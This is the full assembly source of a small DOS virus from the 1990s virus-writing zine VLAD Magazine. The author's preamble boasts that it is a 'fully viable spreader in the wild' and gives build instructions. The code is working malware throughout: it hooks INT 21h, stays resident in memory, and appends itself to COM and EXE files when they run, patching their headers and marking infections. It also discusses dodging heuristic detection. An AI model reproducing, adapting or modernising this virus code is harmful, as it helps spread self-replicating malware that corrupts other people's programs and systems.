VLAD Magazine - Issue #3 - Small Virus

1. ;---------------------------------------------------------------------------
2. ;
3. ; Smallest Virus I Could Manage - 263 bytes
4. ; The Smallest Virus I Could Manage
5. ;
6. ; In Nuke InfoJournal #5 I foolishly boasted about a 387-byte TSR COM/EXE
7. ; parasitic infector I'd written.. well the days of semi-lameness are gone
8. ; (that was almost 2 years ago now) and I've come up with the goods.
9. ;
10. ; This is the smallest virus I could figure out at this point in time.
11. ; In all respects, it's a fully viable spreader in the wild, although it
12. ; does have serious 'security' problems - it doesn't trap i24 (critical
13. ; error handler), clean registers before returning control to the host, or
14. ; even use i21 functions by chaining on to the old vector (it calls i21
15. ; with an INT instruction).  I have no pretenses in that I fully don't
16. ; expect to see this in the wild, since it was only written for
17. ; investigative pleasure anyway, to see how small a virus could be
18. ; written.
19. ;
20. ; There was another version of this virus which I gave out to a few people
21. ; on #virus, which had a slight bug (rather, hasty oversight) in it, where
22. ; I changed a bit of code and didn't change a corresponding line a few
23. ; lines later.. which results in the i21 vector being partially
24. ; overwritten and thus the machine will crash (bad side effect!), which
25. ; was 291 bytes.  The difference between this virus and the 'old' one is
26. ; that this one doesn't change the target EXE file's stack, simply leaving
27. ; it and negating the need to carry the extra 4 bytes around with the
28. ; virus, as well as cutting code size.  Also, the 'old' one didn't trigger
29. ; any heuristic flags whereas this one does.  (see below)
30. ;
31. ; This virus is a memory-resident parasitic infector of COM and EXE files
32. ; on execution, 263 bytes.  It doesn't reinfect memory OR files.
33. ;
34. ; The older revision (sm2.asm, and the bug-fix, sm2b.asm) avoided all
35. ; heuristic flags (except maybe suspicious stack); it inserted the delta
36. ; offset straight into the first instruction of the virus, instead of
37. ; doing the usual 'call $+3/pop si/sub si,3'.  However this just took up
38. ; too much code and besides, it's going to get caught anyway, so why
39. ; bother?  So in this version, it was removed, but the lines are only
40. ; commented out.  If, for some reason, you want to re-enable the old
41. ; system, uncomment the appropriate lines and delete the lines with only a
42. ; semicolon after them (ie not the ones with actual comments!).  Enabling
43. ; this will bring the virus size up to all 268 bytes.
44. ;
45. ; In its current form, I think it's as optimized as I can make it.  Apart
46. ; from the odd 1-byte improvement, any difference would require a change
47. ; in viral architecture.  Some hardcore processor head would have to do it,
48. ; perhaps they'd get a virus of 260 bytes.. but below that, I'm sure it'd
49. ; have to be deficient or unreliable in some respect (as far as I can
50. ; rationally extrapolate, judging how limited this virus is in avoiding
51. ; detection).  I'm certainly not saying that a smaller virus cannot be
52. ; written, however, because it's probably possible.  If I could see how,
53. ; though, I'd do it! :)  Making this smaller would require the removal of
54. ; 'safety' checks (eg bailing if the file can't be opened, bailing if the
55. ; file is less than 24 bytes, etc).  However I consider these checks to be
56. ; part of a viable virus, so I left them in.
57. ;
58. ; There isn't a great deal of commenting on this virus.  A few of the
59. ; techniques just aren't applicable to viruses of the normal kind, so
60. ; there's no real point.  To gain anything much out of examining this
61. ; the source you more or less have to have a good idea of what's going on
62. ; anyway.
63. ;
64. ;
65. ; by T�L�N
66. ;
67. ; compile with a86, rename the .bin to a .com and it's ready to roll...
68. ;
69.  
70. org 0
71. @marker equ 19h
72.  
73. v_start:        ; mov si, 0100h
74.                 call $+3        ;
75.                 pop si          ;
76.                 sub si, 3       ;
77.  
78.                 push ds
79.                 xor ax, ax              ; this virus resides at the end
80.                 mov es, ax              ; of the interrupt table & then some
81.                 mov di, 200h
82.                 push di
83.                 cld
84.                 scasw                   ; is the space clear?
85.                 pop di
86.                 jne v_exit
87.  
88.                 push si
89.                 mov cx, v_len
90.              db 02eh                    ; make CS source of movsb
91.                 rep movsb               ; copy the virus to memory
92.                 mov si, 21h*4           ; & save old i21 vector
93.                 push si
94.              db 26h                     ; make ES source of movsw
95.                 movsw
96.              db 26h
97.                 movsw
98.                 pop di
99.                 mov ax, offset new21 + 200h
100.                 stosw
101.                 xchg ax, cx
102.                 stosw                   ; capture int 21h
103.                 pop si
104. v_exit:         pop es
105.                 add si, offset old_shit
106.                 pop ax
107.                 or sp, sp               ; COM or EXE determination
108.                 push ax
109.                 push cs
110.                 pop ds
111.                 jnz exit_exe
112.  
113. exit_com:       mov di, 100h            ; return to COM host
114.                 push di
115.                 movsw
116.                 movsw
117.                 ret
118. exit_exe:       mov ax, es              ; return to EXE host
119.                 add ax, 10h
120.                 add word ptr [si+2], ax
121.                 jmp dword ptr [si]
122.  
123. old_shit:       int 20h
124.              dw 0
125.  
126. new21:          cmp ax, 4b00h           ; infect on execute
127.                 je infect
128.                 jmp exit21
129.  
130. infect:         push ax
131.                 push bx
132.                 push cx
133.                 push dx
134.                 push si
135.                 push di
136.                 push ds
137.                 push es
138.  
139.                 mov ax, 3d02h           ; open the file
140.                 int 21h
141.                 jc bitch
142.  
143.                 push cs
144.                 pop ds
145.                 push cs
146.                 pop es
147.  
148.                 xchg ax, bx
149.                 mov ah, 3fh
150.                 mov cx, 24
151.                 mov dx, offset signature+200h
152.                 int 21h                ; read header
153.                 xor cx, ax
154.                 jnz bitch1
155.  
156.                 mov si, dx
157.                 push ax
158.                 mov al, @marker
159.                 cmp byte ptr [si+3], al ; is the infection marker present?
160.                                         ;(com)
161.                 je bitch2
162.                 cmp byte ptr [si+12h], al       ; (exe)
163.                 je bitch2
164.  
165.                 mov ax, 4202h           ; seek to EOF  dx:ax -> file len
166.                 cwd
167.                 int 21h                 ; cx is already zero
168.                 push ax
169.  
170.                 mov di, offset old_shit+200h
171.                 cmp byte ptr [si], 'M'
172.                 je infect_exe
173. infect_com:     push si
174.                 movsw                   ; save first 4 of COM
175.                 movsw
176.                 pop di
177.                 mov al, 0e9
178.                 stosb
179.                 pop ax
180. ;                inc ah
181. ;                mov word ptr [v_start+201h], ax
182. ;                sub ax, 103h
183.                 dec ax          ;
184.                 dec ax          ;
185.                 dec ax          ;
186.                 stosw
187.                 mov byte ptr [di], @marker      ; mark infection
188.  
189. write_us:       mov ah, 40h
190.                 mov cx, v_len
191.                 mov dx, 200h
192.                 int 21h
193.  
194. write_hdr:      mov ax, 4200h
195.                 cwd
196.                 xor cx, cx
197.                 int 21h
198.  
199.                 pop cx
200.                 mov ah, 40h
201.                 mov dx, offset signature+200h
202.                 int 21h
203.  
204.                 push ax                 ; ambiguous instruction
205.  
206. bitch2:         pop ax
207. bitch1:         mov ah, 3eh
208.                 int 21h
209. bitch:          pop es
210.                 pop ds
211.                 pop di
212.                 pop si
213.                 pop dx
214.                 pop cx
215.                 pop bx
216.                 pop ax
217. exit21:         jmp dword ptr cs:[old21+200h]
218.  
219. infect_exe:     push dx
220.                 push si
221.                 mov si, offset [exe_ip+200h]
222.                 movsw                   ; save IP, CS
223.                 movsw
224.                 add ax, v_len           ; calculate part_page, page_cnt
225.                 adc dx, 0               ; of infected file
226.                 mov cx, 200h
227.                 div cx
228.                 pop di
229.                 scasw
230.                 scasw
231.                 std                     ; a novel approach..
232.                 or dx, dx
233.                 jz noinc
234.                 inc ax
235. noinc:          stosw                   ; store the new values..
236.                 xchg ax, dx
237.                 stosw
238.  
239.                 pop dx
240.                 pop ax
241.                 mov cx, 10h             ; calculate # of paragraphs
242.                 div cx                  ; in the uninfected file
243.                 sub ax, word ptr [hdr_size+200h]
244.  
245.                 mov di, offset relo_cs+200h
246.                 stosw                   ; & set new IP, CS (entry pt)
247.                 xchg ax, dx
248.                 stosw
249. ;                mov word ptr [v_start+201h], ax
250.                 mov ax, @marker
251.                 stosw
252.                 jmp short write_us
253.  
254.  
255. v_end:
256. old21   equ     v_end + 0
257. signature       equ old21 + 4           ; where we load the host files header
258. part_page       equ signature + 2       ; part-page at EOF
259. page_cnt        equ part_page + 2       ; count of code pages
260. hdr_size        equ page_cnt + 4        ; size of header in paragraphs
261. minmem          equ hdr_size + 2        ; minimum memory required
262. maxmem          equ minmem + 2          ; maximum memory required
263. relo_ss         equ maxmem + 2          ; displacement of stack segment (SS)
264. exe_sp          equ relo_ss + 2         ; stack pointer (SP)
265. chksum          equ exe_sp + 2          ; -> infection marker
266. exe_ip          equ chksum + 2          ; instruction pointer (IP)
267. relo_cs         equ exe_ip + 2          ; displacement of code segment (CS)
268.                                         ; 24 bytes for EXE header information
269.  
270. v_len equ v_end - v_start
271.  
272. ;
273. ;-------the-end-------------------------------------------------------------
274.